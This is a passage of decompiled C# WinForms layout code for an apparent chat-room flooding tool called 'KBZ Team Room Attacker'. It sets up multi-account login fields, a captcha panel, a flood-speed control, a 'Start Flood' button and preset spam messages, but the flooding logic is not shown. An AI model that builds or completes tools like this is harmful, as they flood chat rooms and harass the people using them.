  1142. this.textBox10 = new TextBox();
  1143. this.textBox9 = new TextBox();
  1144. this.textBox8 = new TextBox();
  1145. this.textBox7 = new TextBox();
  1146. this.textBox6 = new TextBox();
  1147. this.groupBox5 = new GroupBox();
  1148. this.textBox14 = new TextBox();
  1149. this.textBox15 = new TextBox();
  1150. this.textBox16 = new TextBox();
  1151. this.textBox17 = new TextBox();
  1152. this.textBox18 = new TextBox();
  1153. this.textBox19 = new TextBox();
  1154. this.textBox20 = new TextBox();
  1155. this.textBox21 = new TextBox();
  1156. this.groupBox6 = new GroupBox();
  1157. this.label11 = new Label();
  1158. this.label10 = new Label();
  1159. this.textBox2 = new TextBox();
  1160. this.roomname = new TextBox();
  1161. this.groupBox7 = new GroupBox();
  1162. this.textBox22 = new TextBox();
  1163. this.pictureBox3 = new PictureBox();
  1164. this.captcha = new TextBox();
  1165. this.groupBox8 = new GroupBox();
  1166. this.numericUpDown1 = new NumericUpDown();
  1167. this.label5 = new Label();
  1168. this.groupBox9 = new GroupBox();
  1169. this.label9 = new Label();
  1170. this.tabControl1 = new TabControl();
  1171. this.tabPage1 = new TabPage();
  1172. this.label14 = new Label();
  1173. this.groupBox10 = new GroupBox();
  1174. this.label13 = new Label();
  1175. this.tabPage2 = new TabPage();
  1176. this.tabPage3 = new TabPage();
  1177. this.label12 = new Label();
  1178. this.pictureBox4 = new PictureBox();
  1179. ((ISupportInitialize)this.pictureBox2).BeginInit();
  1180. ((ISupportInitialize)this.pictureBox1).BeginInit();
  1181. this.groupBox1.SuspendLayout();
  1182. this.groupBox2.SuspendLayout();
  1183. this.groupBox3.SuspendLayout();
  1184. this.groupBox4.SuspendLayout();
  1185. this.groupBox5.SuspendLayout();
  1186. this.groupBox6.SuspendLayout();
  1187. this.groupBox7.SuspendLayout();
  1188. ((ISupportInitialize)this.pictureBox3).BeginInit();
  1189. this.groupBox8.SuspendLayout();
  1190. ((ISupportInitialize)this.numericUpDown1).BeginInit();
  1191. this.groupBox9.SuspendLayout();
  1192. this.tabControl1.SuspendLayout();
  1193. this.tabPage1.SuspendLayout();
  1194. this.groupBox10.SuspendLayout();
  1195. this.tabPage2.SuspendLayout();
  1196. this.tabPage3.SuspendLayout();
  1197. ((ISupportInitialize)this.pictureBox4).BeginInit();
  1198. base.SuspendLayout();
  1199. this.button1.BackColor = Color.Black;
  1200. this.button1.ForeColor = Color.Lime;
  1201. this.button1.Location = new Point(6, 149);
  1202. this.button1.Name = "button1";
  1203. this.button1.Size = new Size(90, 42);
  1204. this.button1.TabIndex = 3;
  1205. this.button1.Text = "LOGIN";
  1206. this.button1.UseVisualStyleBackColor = false;
  1207. this.button1.Click += new EventHandler(this.button1_Click);
  1208. this.button2.BackColor = Color.Black;
  1209. this.button2.ForeColor = Color.Red;
  1210. this.button2.Location = new Point(127, 149);
  1211. this.button2.Name = "button2";
  1212. this.button2.Size = new Size(87, 42);
  1213. this.button2.TabIndex = 11;
  1214. this.button2.Text = "LOGOUT";
  1215. this.button2.UseVisualStyleBackColor = false;
  1216. this.button2.Click += new EventHandler(this.button2_Click);
  1217. this.button3.BackColor = Color.Black;
  1218. this.button3.ForeColor = Color.Lime;
  1219. this.button3.Location = new Point(6, 66);
  1220. this.button3.Name = "button3";
  1221. this.button3.Size = new Size(217, 35);
  1222. this.button3.TabIndex = 5;
  1223. this.button3.Text = "Join To Room";
  1224. this.button3.UseVisualStyleBackColor = false;
  1225. this.button3.Click += new EventHandler(this.button3_Click);
  1226. this.button4.BackColor = Color.Black;
  1227. this.button4.ForeColor = Color.Lime;
  1228. this.button4.Location = new Point(6, 51);
  1229. this.button4.Name = "button4";
  1230. this.button4.Size = new Size(217, 44);
  1231. this.button4.TabIndex = 10;
  1232. this.button4.Text = "Start Flood";
  1233. this.button4.UseVisualStyleBackColor = false;
  1234. this.button4.Click += new EventHandler(this.button4_Click);
  1235. this.textBox1.Location = new Point(6, 45);
  1236. this.textBox1.Name = "textBox1";
  1237. this.textBox1.Size = new Size(208, 20);
  1238. this.textBox1.TabIndex = 12;
  1239. this.textBox1.Text = "ID2";
  1240. this.textBox3.ForeColor = Color.Black;
  1241. this.textBox3.Location = new Point(6, 172);
  1242. this.textBox3.Name = "textBox3";
  1243. this.textBox3.Size = new Size(198, 20);
  1244. this.textBox3.TabIndex = 14;
  1245. this.label1.AutoSize = true;
  1246. this.label1.Font = new Font("Castellar", 26.25f, FontStyle.Italic, GraphicsUnit.Point, 0);
  1247. this.label1.ForeColor = Color.Black;
  1248. this.label1.Location = new Point(113, 11);
  1249. this.label1.Name = "label1";
  1250. this.label1.Size = new Size(215, 42);
  1251. this.label1.TabIndex = 16;
  1252. this.label1.Text = "KBZ Team";
  1253. this.label1.Click += new EventHandler(this.label1_Click);
  1254. this.label2.AutoSize = true;
  1255. this.label2.Font = new Font("Microsoft Sans Serif", 36f, FontStyle.Bold, GraphicsUnit.Point, 0);
  1256. this.label2.ForeColor = Color.Black;
  1257. this.label2.Location = new Point(110, 53);
  1258. this.label2.Name = "label2";
  1259. this.label2.Size = new Size(355, 55);
  1260. this.label2.TabIndex = 17;
  1261. this.label2.Text = "Room Attacker";
  1262. this.label2.Click += new EventHandler(this.label2_Click);
  1263. this.pictureBox2.BackColor = Color.White;
  1264. this.pictureBox2.Location = new Point(6, 106);
  1265. this.pictureBox2.Name = "pictureBox2";
  1266. this.pictureBox2.Size = new Size(198, 60);
  1267. this.pictureBox2.SizeMode = PictureBoxSizeMode.StretchImage;
  1268. this.pictureBox2.TabIndex = 15;
  1269. this.pictureBox2.TabStop = false;
  1270. this.pictureBox1.BackColor = Color.White;
  1271. this.pictureBox1.BackgroundImageLayout = ImageLayout.Stretch;
  1272. this.pictureBox1.Location = new Point(6, 19);
  1273. this.pictureBox1.Name = "pictureBox1";
  1274. this.pictureBox1.Size = new Size(198, 60);
  1275. this.pictureBox1.SizeMode = PictureBoxSizeMode.StretchImage;
  1276. this.pictureBox1.TabIndex = 8;
  1277. this.pictureBox1.TabStop = false;
  1278. this.groupBox1.Controls.Add(this.label3);
  1279. this.groupBox1.Controls.Add(this.linkLabel1);
  1280. this.groupBox1.ForeColor = Color.Black;
  1281. this.groupBox1.Location = new Point(0, 104);
  1282. this.groupBox1.Name = "groupBox1";
  1283. this.groupBox1.Size = new Size(465, 44);
  1284. this.groupBox1.TabIndex = 21;
  1285. this.groupBox1.TabStop = false;
  1286. this.label3.AutoSize = true;
  1287. this.label3.Font = new Font("Microsoft Sans Serif", 12f, FontStyle.Bold, GraphicsUnit.Point, 0);
  1288. this.label3.Location = new Point(6, 14);
  1289. this.label3.Name = "label3";
  1290. this.label3.Size = new Size(171, 20);
  1291. this.label3.TabIndex = 2;
  1292. this.label3.Text = "Visit Our Forum -->>";
  1293. this.linkLabel1.AutoSize = true;
  1294. this.linkLabel1.Font = new Font("Microsoft Sans Serif", 14.25f, FontStyle.Bold, GraphicsUnit.Point, 0);
  1295. this.linkLabel1.ForeColor = Color.Black;
  1296. this.linkLabel1.LinkBehavior = LinkBehavior.HoverUnderline;
  1297. this.linkLabel1.LinkColor = Color.Black;
  1298. this.linkLabel1.Location = new Point(208, 10);
  1299. this.linkLabel1.Name = "linkLabel1";
  1300. this.linkLabel1.Size = new Size(253, 24);
  1301. this.linkLabel1.TabIndex = 0;
  1302. this.linkLabel1.TabStop = true;
  1303. this.linkLabel1.Text = "www.kbzteam.forums1.net";
  1304. this.groupBox2.Controls.Add(this.button6);
  1305. this.groupBox2.Controls.Add(this.textBox4);
  1306. this.groupBox2.Location = new Point(3, 3);
  1307. this.groupBox2.Name = "groupBox2";
  1308. this.groupBox2.Size = new Size(222, 199);
  1309. this.groupBox2.TabIndex = 22;
  1310. this.groupBox2.TabStop = false;
  1311. this.groupBox2.Text = "IDS Split By {#}";
  1312. this.button6.BackColor = Color.Black;
  1313. this.button6.ForeColor = Color.Lime;
  1314. this.button6.Location = new Point(6, 149);
  1315. this.button6.Name = "button6";
  1316. this.button6.Size = new Size(210, 42);
  1317. this.button6.TabIndex = 14;
  1318. this.button6.Text = "GET IDS";
  1319. this.button6.UseVisualStyleBackColor = false;
  1320. this.button6.Click += new EventHandler(this.button6_Click);
  1321. this.textBox4.Location = new Point(6, 19);
  1322. this.textBox4.Multiline = true;
  1323. this.textBox4.Name = "textBox4";
  1324. this.textBox4.Size = new Size(210, 114);
  1325. this.textBox4.TabIndex = 13;
  1326. this.textBox4.Text = "ID1#ID2#ID3#ID4#......";
  1327. this.groupBox3.Controls.Add(this.textBox5);
  1328. this.groupBox3.Controls.Add(this.username);
  1329. this.groupBox3.Controls.Add(this.password);
  1330. this.groupBox3.Controls.Add(this.textBox1);
  1331. this.groupBox3.Controls.Add(this.button2);
  1332. this.groupBox3.Controls.Add(this.button1);
  1333. this.groupBox3.Location = new Point(231, 3);
  1334. this.groupBox3.Name = "groupBox3";
  1335. this.groupBox3.Size = new Size(220, 199);
  1336. this.groupBox3.TabIndex = 23;
  1337. this.groupBox3.TabStop = false;
  1338. this.groupBox3.Text = "GET IDS";
  1339. this.textBox5.Location = new Point(6, 72);
  1340. this.textBox5.Name = "textBox5";
  1341. this.textBox5.Size = new Size(208, 20);
  1342. this.textBox5.TabIndex = 15;
  1343. this.textBox5.Text = "ID3";
  1344. this.textBox5.TextChanged += new EventHandler(this.textBox5_TextChanged);
  1345. this.username.Location = new Point(6, 19);
  1346. this.username.Name = "username";
  1347. this.username.Size = new Size(208, 20);
  1348. this.username.TabIndex = 14;
  1349. this.username.Text = "ID1";
  1350. this.password.Location = new Point(6, 113);
  1351. this.password.Name = "password";
  1352. this.password.Size = new Size(208, 20);
  1353. this.password.TabIndex = 13;
  1354. this.password.Text = "Password";
  1355. this.groupBox4.Controls.Add(this.textBox13);
  1356. this.groupBox4.Controls.Add(this.textBox12);
  1357. this.groupBox4.Controls.Add(this.textBox11);
  1358. this.groupBox4.Controls.Add(this.textBox10);
  1359. this.groupBox4.Controls.Add(this.textBox9);
  1360. this.groupBox4.Controls.Add(this.textBox8);
  1361. this.groupBox4.Controls.Add(this.textBox7);
  1362. this.groupBox4.Controls.Add(this.textBox6);
  1363. this.groupBox4.ForeColor = Color.Red;
  1364. this.groupBox4.Location = new Point(3, 3);
  1365. this.groupBox4.Name = "groupBox4";
  1366. this.groupBox4.Size = new Size(448, 127);
  1367. this.groupBox4.TabIndex = 24;
  1368. this.groupBox4.TabStop = false;
  1369. this.groupBox4.Text = "Flood Message Panel";
  1370. this.textBox13.Location = new Point(388, 16);
  1371. this.textBox13.Multiline = true;
  1372. this.textBox13.Name = "textBox13";
  1373. this.textBox13.Size = new Size(51, 105);
  1374. this.textBox13.TabIndex = 7;
  1375. this.textBox13.Text = "◆\r\n◆◆\r\n◆◆◆\r\n◆◆◆◆\r\n◆◆◆◆◆\r\n◆◆◆◆◆◆\r\n◆◆◆◆◆◆◆\r\n◆◆◆◆◆◆◆◆\r\n◆◆◆◆◆◆◆◆◆\r\n◆◆◆◆◆◆◆◆◆◆\r\n\r\nKbZ RooM AttAcKeR By Balu@n.c\r\nhttp://kbzteam.forums1.net";
  1376. this.textBox13.TextAlign = HorizontalAlignment.Center;
  1377. this.textBox12.Location = new Point(336, 16);
  1378. this.textBox12.Multiline = true;
  1379. this.textBox12.Name = "textBox12";
  1380. this.textBox12.Size = new Size(46, 105);
  1381. this.textBox12.TabIndex = 6;
  1382. this.textBox12.Text = "✔\r\n✔✔\r\n✔✔✔\r\n✔✔✔✔\r\n✔✔✔✔✔\r\n✔✔✔✔✔✔\r\n✔✔✔✔✔✔✔\r\n✔✔✔✔✔✔✔✔\r\n✔✔✔✔✔✔✔✔✔\r\n✔✔✔✔✔✔✔✔✔✔\r\n\r\nKbZ RooM AttAcKeR By Balu@n.c\r\nhttp://kbzteam.forums1.net\r\n";
  1383. this.textBox12.TextAlign = HorizontalAlignment.Center;
  1384. this.textBox11.Location = new Point(284, 16);
  1385. this.textBox11.Multiline = true;
  1386. this.textBox11.Name = "textBox11";
  1387. this.textBox11.Size = new Size(46, 105);
  1388. this.textBox11.TabIndex = 5;
  1389. this.textBox11.Text = "★\r\n★★\r\n★★★\r\n★★★★\r\n★★★★★\r\n★★★★★★\r\n★★★★★★★\r\n★★★★★★★★\r\n★★★★★★★★★\r\n★★★★★★★★★★\r\n\r\nKbZ RooM AttAcKeR By Balu@n.c\r\nhttp://kbzteam.forums1.net\r\n";
  1390. this.textBox11.TextAlign = HorizontalAlignment.Center;
  1391. this.textBox10.Location = new Point(231, 16);
  1392. this.textBox10.Multiline = true;
  1393. this.textBox10.Name = "textBox10";
  1394. this.textBox10.Size = new Size(47, 105);
  1395. this.textBox10.TabIndex = 4;
  1396. this.textBox10.Text = "❤\r\n❤❤\r\n❤❤❤\r\n❤❤❤❤\r\n❤❤❤❤❤\r\n❤❤❤❤❤❤\r\n❤❤❤❤❤❤❤\r\n❤❤❤❤❤❤❤❤\r\n❤❤❤❤❤❤❤❤❤\r\n\r\nKbZ RooM AttAcKeR By Balu@n.c\r\nhttp://kbzteam.forums1.net\r\n";
  1397. this.textBox10.TextAlign = HorizontalAlignment.Center;
  1398. this.textBox9.Location = new Point(175, 16);
  1399. this.textBox9.Multiline = true;
  1400. this.textBox9.Name = "textBox9";
  1401. this.textBox9.Size = new Size(50, 105);
  1402. this.textBox9.TabIndex = 3;
  1403. this.textBox9.Text = "◆\r\n◆◆\r\n◆◆◆\r\n◆◆◆◆\r\n◆◆◆◆◆\r\n◆◆◆◆◆◆\r\n◆◆◆◆◆◆◆\r\n◆◆◆◆◆◆◆◆\r\n◆◆◆◆◆◆◆◆◆\r\n◆◆◆◆◆◆◆◆◆◆\r\n\r\nKbZ RooM AttAcKeR By Balu@n.c\r\nhttp://kbzteam.forums1.net";
  1404. this.textBox9.TextAlign = HorizontalAlignment.Center;
  1405. this.textBox8.Location = new Point(120, 16);
  1406. this.textBox8.Multiline = true;
  1407. this.textBox8.Name = "textBox8";
  1408. this.textBox8.Size = new Size(49, 105);
  1409. this.textBox8.TabIndex = 2;
  1410. this.textBox8.Text = "✔\r\n✔✔\r\n✔✔✔\r\n✔✔✔✔\r\n✔✔✔✔✔\r\n✔✔✔✔✔✔\r\n✔✔✔✔✔✔✔\r\n✔✔✔✔✔✔✔✔\r\n✔✔✔✔✔✔✔✔✔\r\n✔✔✔✔✔✔✔✔✔✔\r\n\r\nKbZ RooM AttAcKeR By Balu@n.c\r\nhttp://kbzteam.forums1.net";
  1411. this.textBox8.TextAlign = HorizontalAlignment.Center;
  1412. this.textBox7.Location = new Point(67, 16);
  1413. this.textBox7.Multiline = true;
  1414. this.textBox7.Name = "textBox7";
  1415. this.textBox7.Size = new Size(47, 105);
  1416. this.textBox7.TabIndex = 1;
  1417. this.textBox7.Text = "★\r\n★★\r\n★★★\r\n★★★★\r\n★★★★★\r\n★★★★★★\r\n★★★★★★★\r\n★★★★★★★★\r\n★★★★★★★★★\r\n★★★★★★★★★★\r\n\r\nKbZ RooM AttAcKeR By Balu@n.c\r\nhttp://kbzteam.forums1.net";
  1418. this.textBox7.TextAlign = HorizontalAlignment.Center;
  1419. this.textBox6.Location = new Point(8, 16);
  1420. this.textBox6.Multiline = true;
  1421. this.textBox6.Name = "textBox6";
  1422. this.textBox6.Size = new Size(53, 105);
  1423. this.textBox6.TabIndex = 0;
  1424. this.textBox6.Text = "❤\r\n❤❤\r\n❤❤❤\r\n❤❤❤❤\r\n❤❤❤❤❤\r\n❤❤❤❤❤❤\r\n❤❤❤❤❤❤❤\r\n❤❤❤❤❤❤❤❤\r\n❤❤❤❤❤❤❤❤❤\r\n\r\nKbZ RooM AttAcKeR By Balu@n.c\r\nhttp://kbzteam.forums1.net";
  1425. this.textBox6.TextAlign = HorizontalAlignment.Center;
  1426. this.groupBox5.Controls.Add(this.textBox14);
  1427. this.groupBox5.Controls.Add(this.textBox15);
  1428. this.groupBox5.Controls.Add(this.textBox16);
  1429. this.groupBox5.Controls.Add(this.textBox17);
  1430. this.groupBox5.Controls.Add(this.textBox18);
  1431. this.groupBox5.Controls.Add(this.textBox19);
  1432. this.groupBox5.Controls.Add(this.textBox20);
  1433. this.groupBox5.Controls.Add(this.textBox21);
  1434. this.groupBox5.Location = new Point(3, 130);
  1435. this.groupBox5.Name = "groupBox5";
  1436. this.groupBox5.Size = new Size(448, 127);
  1437. this.groupBox5.TabIndex = 25;
  1438. this.groupBox5.TabStop = false;
  1439. this.textBox14.Location = new Point(388, 16);
  1440. this.textBox14.Multiline = true;
  1441. this.textBox14.Name = "textBox14";
  1442. this.textBox14.Size = new Size(51, 105);
  1443. this.textBox14.TabIndex = 7;
  1444. this.textBox14.Text = "◆\r\n◆◆\r\n◆◆◆\r\n◆◆◆◆\r\n◆◆◆◆◆\r\n◆◆◆◆◆◆\r\n◆◆◆◆◆◆◆\r\n◆◆◆◆◆◆◆◆\r\n◆◆◆◆◆◆◆◆◆\r\n◆◆◆◆◆◆◆◆◆◆\r\n\r\nKbZ RooM AttAcKeR By Balu@n.c\r\nhttp://kbzteam.forums1.net\r\n";
  1445. this.textBox14.TextAlign = HorizontalAlignment.Center;
  1446. this.textBox15.Location = new Point(336, 16);
  1447. this.textBox15.Multiline = true;
  1448. this.textBox15.Name = "textBox15";
  1449. this.textBox15.Size = new Size(46, 105);
  1450. this.textBox15.TabIndex = 6;
  1451. this.textBox15.Text = "✔\r\n✔✔\r\n✔✔✔\r\n✔✔✔✔\r\n✔✔✔✔✔\r\n✔✔✔✔✔✔\r\n✔✔✔✔✔✔✔\r\n✔✔✔✔✔✔✔✔\r\n✔✔✔✔✔✔✔✔✔\r\n✔✔✔✔✔✔✔✔✔✔\r\n\r\nKbZ RooM AttAcKeR By Balu@n.c\r\nhttp://kbzteam.forums1.net\r\n";
  1452. this.textBox15.TextAlign = HorizontalAlignment.Center;
  1453. this.textBox16.Location = new Point(284, 16);
  1454. this.textBox16.Multiline = true;
  1455. this.textBox16.Name = "textBox16";
  1456. this.textBox16.Size = new Size(46, 105);
  1457. this.textBox16.TabIndex = 5;
  1458. this.textBox16.Text = "★\r\n★★\r\n★★★\r\n★★★★\r\n★★★★★\r\n★★★★★★\r\n★★★★★★★\r\n★★★★★★★★\r\n★★★★★★★★★\r\n★★★★★★★★★★\r\n\r\nKbZ RooM AttAcKeR By Balu@n.c\r\nhttp://kbzteam.forums1.net";
  1459. this.textBox16.TextAlign = HorizontalAlignment.Center;
  1460. this.textBox17.Location = new Point(231, 16);
  1461. this.textBox17.Multiline = true;
  1462. this.textBox17.Name = "textBox17";
  1463. this.textBox17.Size = new Size(47, 105);
  1464. this.textBox17.TabIndex = 4;
  1465. this.textBox17.Text = "❤\r\n❤❤\r\n❤❤❤\r\n❤❤❤❤\r\n❤❤❤❤❤\r\n❤❤❤❤❤❤\r\n❤❤❤❤❤❤❤\r\n❤❤❤❤❤❤❤❤\r\n❤❤❤❤❤❤❤❤❤\r\n\r\nKbZ RooM AttAcKeR By Balu@n.c\r\nhttp://kbzteam.forums1.net\r\n";
  1466. this.textBox17.TextAlign = HorizontalAlignment.Center;
  1467. this.textBox18.Location = new Point(175, 16);
  1468. this.textBox18.Multiline = true;
  1469. this.textBox18.Name = "textBox18";
  1470. this.textBox18.Size = new Size(50, 105);
  1471. this.textBox18.TabIndex = 3;
  1472. this.textBox18.Text = "◆\r\n◆◆\r\n◆◆◆\r\n◆◆◆◆\r\n◆◆◆◆◆\r\n◆◆◆◆◆◆\r\n◆◆◆◆◆◆◆\r\n◆◆◆◆◆◆◆◆\r\n◆◆◆◆◆◆◆◆◆\r\n◆◆◆◆◆◆◆◆◆◆\r\n\r\nKbZ RooM AttAcKeR By Balu@n.c\r\nhttp://kbzteam.forums1.net\r\n";
  1473. this.textBox18.TextAlign = HorizontalAlignment.Center;
  1474. this.textBox19.Location = new Point(120, 16);
  1475. this.textBox19.Multiline = true;
  1476. this.textBox19.Name = "textBox19";
  1477. this.textBox19.Size = new Size(49, 105);
  1478. this.textBox19.TabIndex = 2;
  1479. this.textBox19.Text = "✔\r\n✔✔\r\n✔✔✔\r\n✔✔✔✔\r\n✔✔✔✔✔\r\n✔✔✔✔✔✔\r\n✔✔✔✔✔✔✔\r\n✔✔✔✔✔✔✔✔\r\n✔✔✔✔✔✔✔✔✔\r\n✔✔✔✔✔✔✔✔✔✔\r\n\r\nKbZ RooM AttAcKeR By Balu@n.c\r\nhttp://kbzteam.forums1.net";
  1480. this.textBox19.TextAlign = HorizontalAlignment.Center;
  1481. this.textBox20.Location = new Point(67, 16);
  1482. this.textBox20.Multiline = true;
  1483. this.textBox20.Name = "textBox20";
  1484. this.textBox20.Size = new Size(47, 105);
  1485. this.textBox20.TabIndex = 1;
  1486. this.textBox20.Text = "★\r\n★★\r\n★★★\r\n★★★★\r\n★★★★★\r\n★★★★★★\r\n★★★★★★★\r\n★★★★★★★★\r\n★★★★★★★★★\r\n★★★★★★★★★★\r\n\r\nKbZ RooM AttAcKeR By Balu@n.c\r\nhttp://kbzteam.forums1.net\r\n";
  1487. this.textBox20.TextAlign = HorizontalAlignment.Center;
  1488. this.textBox21.Location = new Point(8, 16);
  1489. this.textBox21.Multiline = true;
  1490. this.textBox21.Name = "textBox21";
  1491. this.textBox21.Size = new Size(53, 105);
  1492. this.textBox21.TabIndex = 0;
  1493. this.textBox21.Text = "❤\r\n❤❤\r\n❤❤❤\r\n❤❤❤❤\r\n❤❤❤❤❤\r\n❤❤❤❤❤❤\r\n❤❤❤❤❤❤❤\r\n❤❤❤❤❤❤❤❤\r\n❤❤❤❤❤❤❤❤❤\r\n\r\nKbZ RooM AttAcKeR By Balu@n.c\r\nhttp://kbzteam.forums1.net";
  1494. this.textBox21.TextAlign = HorizontalAlignment.Center;
  1495. this.groupBox6.Controls.Add(this.label11);
  1496. this.groupBox6.Controls.Add(this.label10);
  1497. this.groupBox6.Controls.Add(this.textBox2);
  1498. this.groupBox6.Controls.Add(this.roomname);
  1499. this.groupBox6.Controls.Add(this.button3);
  1500. this.groupBox6.ForeColor = Color.Red;
  1501. this.groupBox6.Location = new Point(6, 3);
  1502. this.groupBox6.Name = "groupBox6";
  1503. this.groupBox6.Size = new Size(229, 107);
  1504. this.groupBox6.TabIndex = 26;
  1505. this.groupBox6.TabStop = false;
  1506. this.groupBox6.Text = "Room Options";
  1507. this.label11.AutoSize = true;
  1508. this.label11.Location = new Point(3, 43);
  1509. this.label11.Name = "label11";
  1510. this.label11.Size = new Size(90, 13);
  1511. this.label11.TabIndex = 18;
  1512. this.label11.Text = "Room Password :";
  1513. this.label10.AutoSize = true;
  1514. this.label10.Location = new Point(3, 17);
  1515. this.label10.Name = "label10";
  1516. this.label10.Size = new Size(72, 13);
  1517. this.label10.TabIndex = 17;
  1518. this.label10.Text = "Room Name :";
  1519. this.textBox2.Location = new Point(115, 40);
  1520. this.textBox2.Name = "textBox2";
  1521. this.textBox2.Size = new Size(108, 20);
  1522. this.textBox2.TabIndex = 16;
  1523. this.roomname.Location = new Point(115, 14);
  1524. this.roomname.Name = "roomname";
  1525. this.roomname.Size = new Size(108, 20);
  1526. this.roomname.TabIndex = 15;
  1527. this.groupBox7.Controls.Add(this.textBox22);
  1528. this.groupBox7.Controls.Add(this.pictureBox3);
  1529. this.groupBox7.Controls.Add(this.captcha);
  1530. this.groupBox7.Controls.Add(this.pictureBox2);
  1531. this.groupBox7.Controls.Add(this.pictureBox1);
  1532. this.groupBox7.Controls.Add(this.textBox3);
  1533. this.groupBox7.ForeColor = Color.Red;
  1534. this.groupBox7.Location = new Point(241, 3);
  1535. this.groupBox7.Name = "groupBox7";
  1536. this.groupBox7.Size = new Size(210, 295);
  1537. this.groupBox7.TabIndex = 27;
  1538. this.groupBox7.TabStop = false;
  1539. this.groupBox7.Text = "Captcha Panel";
  1540. this.textBox22.Location = new Point(6, 269);
  1541. this.textBox22.Name = "textBox22";
  1542. this.textBox22.Size = new Size(198, 20);
  1543. this.textBox22.TabIndex = 18;
  1544. this.pictureBox3.BackColor = Color.White;
  1545. this.pictureBox3.Location = new Point(6, 203);
  1546. this.pictureBox3.Name = "pictureBox3";
  1547. this.pictureBox3.Size = new Size(198, 60);
  1548. this.pictureBox3.TabIndex = 17;
  1549. this.pictureBox3.TabStop = false;
  1550. this.captcha.ForeColor = Color.Black;
  1551. this.captcha.Location = new Point(6, 81);
  1552. this.captcha.Name = "captcha";
  1553. this.captcha.Size = new Size(198, 20);
  1554. this.captcha.TabIndex = 16;
  1555. this.groupBox8.Controls.Add(this.numericUpDown1);
  1556. this.groupBox8.Controls.Add(this.label5);
  1557. this.groupBox8.Controls.Add(this.button4);
  1558. this.groupBox8.ForeColor = Color.Red;
  1559. this.groupBox8.Location = new Point(6, 141);
  1560. this.groupBox8.Name = "groupBox8";
  1561. this.groupBox8.Size = new Size(229, 106);
  1562. this.groupBox8.TabIndex = 28;
  1563. this.groupBox8.TabStop = false;
  1564. this.groupBox8.Text = "Flood Manager";
  1565. NumericUpDown arg_1DBF_0 = this.numericUpDown1;
  1566. int[] array = new int[4];
  1567. array[0] = 100;
  1568. arg_1DBF_0.Increment = new decimal(array);
  1569. this.numericUpDown1.Location = new Point(115, 25);
  1570. NumericUpDown arg_1DF5_0 = this.numericUpDown1;
  1571. array = new int[4];
  1572. array[0] = 800;
  1573. arg_1DF5_0.Maximum = new decimal(array);
  1574. this.numericUpDown1.Name = "numericUpDown1";
  1575. this.numericUpDown1.Size = new Size(108, 20);
  1576. this.numericUpDown1.TabIndex = 12;
  1577. NumericUpDown arg_1E4A_0 = this.numericUpDown1;
  1578. array = new int[4];
  1579. array[0] = 250;
  1580. arg_1E4A_0.Value = new decimal(array);
  1581. this.numericUpDown1.ValueChanged += new EventHandler(this.numericUpDown1_ValueChanged);
  1582. this.label5.AutoSize = true;
  1583. this.label5.ForeColor = Color.Red;
  1584. this.label5.Location = new Point(3, 27);
  1585. this.label5.Name = "label5";
  1586. this.label5.Size = new Size(73, 13);
  1587. this.label5.TabIndex = 11;
  1588. this.label5.Text = "Flood Speed :";
  1589. this.groupBox9.Controls.Add(this.label9);
  1590. this.groupBox9.Location = new Point(3, 257);
  1591. this.groupBox9.Name = "groupBox9";
  1592. this.groupBox9.Size = new Size(448, 44);
  1593. this.groupBox9.TabIndex = 32;
  1594. this.groupBox9.TabStop = false;
  1595. this.label9.AutoSize = true;
  1596. this.label9.Font = new Font("Corbel", 20.25f, FontStyle.Bold | FontStyle.Underline, GraphicsUnit.Point, 0);
  1597. this.label9.ForeColor = Color.Lime;
  1598. this.label9.Location = new Point(17, 8);
  1599. this.label9.Name = "label9";
  1600. this.label9.Size = new Size(404, 33);
  1601. this.label9.TabIndex = 0;
  1602. this.label9.Text = "WWW.KBZTEAM.FORUMS1.NET";
  1603. this.tabControl1.Controls.Add(this.tabPage1);
  1604. this.tabControl1.Controls.Add(this.tabPage2);
  1605. this.tabControl1.Controls.Add(this.tabPage3);
  1606. this.tabControl1.Location = new Point(0, 145);
  1607. this.tabControl1.Name = "tabControl1";
  1608. this.tabControl1.SelectedIndex = 0;
  1609. this.tabControl1.Size = new Size(465, 330);
  1610. this.tabControl1.TabIndex = 33;
  1611. this.tabPage1.BackColor = Color.Black;
  1612. this.tabPage1.Controls.Add(this.label14);
  1613. this.tabPage1.Controls.Add(this.groupBox10);
  1614. this.tabPage1.Controls.Add(this.groupBox2);
  1615. this.tabPage1.Controls.Add(this.groupBox3);
  1616. this.tabPage1.Location = new Point(4, 22);
  1617. this.tabPage1.Name = "tabPage1";
  1618. this.tabPage1.Padding = new Padding(3);
  1619. this.tabPage1.Size = new Size(457, 304);
  1620. this.tabPage1.TabIndex = 0;
  1621. this.tabPage1.Text = "ID SETTINGS";
  1622. this.tabPage1.Click += new EventHandler(this.tabPage1_Click);
  1623. this.label14.AutoSize = true;
  1624. this.label14.Font = new Font("Juice ITC", 20.25f, FontStyle.Bold | FontStyle.Italic, GraphicsUnit.Point, 0);
  1625. this.label14.ForeColor = Color.Lime;
  1626. this.label14.Location = new Point(58, 205);
  1627. this.label14.Name = "label14";
  1628. this.label14.Size = new Size(351, 31);
  1629. this.label14.TabIndex = 35;
  1630. this.label14.Text = "KBZTEAM ROOM ATTACKER By BALU@N.C";
  1631. this.label14.TextAlign = ContentAlignment.MiddleCenter;
  1632. this.groupBox10.Controls.Add(this.label13);
  1633. this.groupBox10.Location = new Point(3, 237);
  1634. this.groupBox10.Name = "groupBox10";
  1635. this.groupBox10.Size = new Size(451, 61);
  1636. this.groupBox10.TabIndex = 34;
  1637. this.groupBox10.TabStop = false;
  1638. this.label13.AutoSize = true;
  1639. this.label13.Font = new Font("Corbel", 21.75f, FontStyle.Bold | FontStyle.Underline, GraphicsUnit.Point, 0);
  1640. this.label13.ForeColor = Color.White;
  1641. this.label13.Location = new Point(14, 16);
  1642. this.label13.Name = "label13";
  1643. this.label13.Size = new Size(428, 36);
  1644. this.label13.TabIndex = 0;
  1645. this.label13.Text = "WWW.KBZTEAM.FORUMS1.NET";
  1646. this.tabPage2.BackColor = Color.Black;
  1647. this.tabPage2.Controls.Add(this.groupBox4);
  1648. this.tabPage2.Controls.Add(this.groupBox9);
  1649. this.tabPage2.Controls.Add(this.groupBox5);
  1650. this.tabPage2.Location = new Point(4, 22);
  1651. this.tabPage2.Name = "tabPage2";
  1652. this.tabPage2.Padding = new Padding(3);
  1653. this.tabPage2.Size = new Size(457, 304);
  1654. this.tabPage2.TabIndex = 1;
  1655. this.tabPage2.Text = "MESSAGE";
  1656. this.tabPage3.BackColor = Color.Black;
  1657. this.tabPage3.Controls.Add(this.label12);
  1658. this.tabPage3.Controls.Add(this.groupBox6);
  1659. this.tabPage3.Controls.Add(this.groupBox7);
  1660. this.tabPage3.Controls.Add(this.groupBox8);
